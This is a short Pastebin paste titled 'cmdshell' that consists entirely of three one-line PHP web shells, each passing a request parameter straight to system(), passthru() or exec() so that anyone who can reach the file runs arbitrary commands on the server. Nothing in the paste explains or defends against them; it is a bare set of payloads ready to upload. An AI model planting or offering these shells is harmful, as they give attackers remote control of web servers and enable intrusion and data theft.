lordaung

cmdshell

Apr 29th, 2018
60
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.10 KB | None | 0 0
  1. <?php system($_GET['cmd']); ?>
  2. <?php passthru($_REQUEST['cmd']); ?>
  3. <?php echo exec($_POST['cmd']); ?>
Add Comment
Please, Sign In to add comment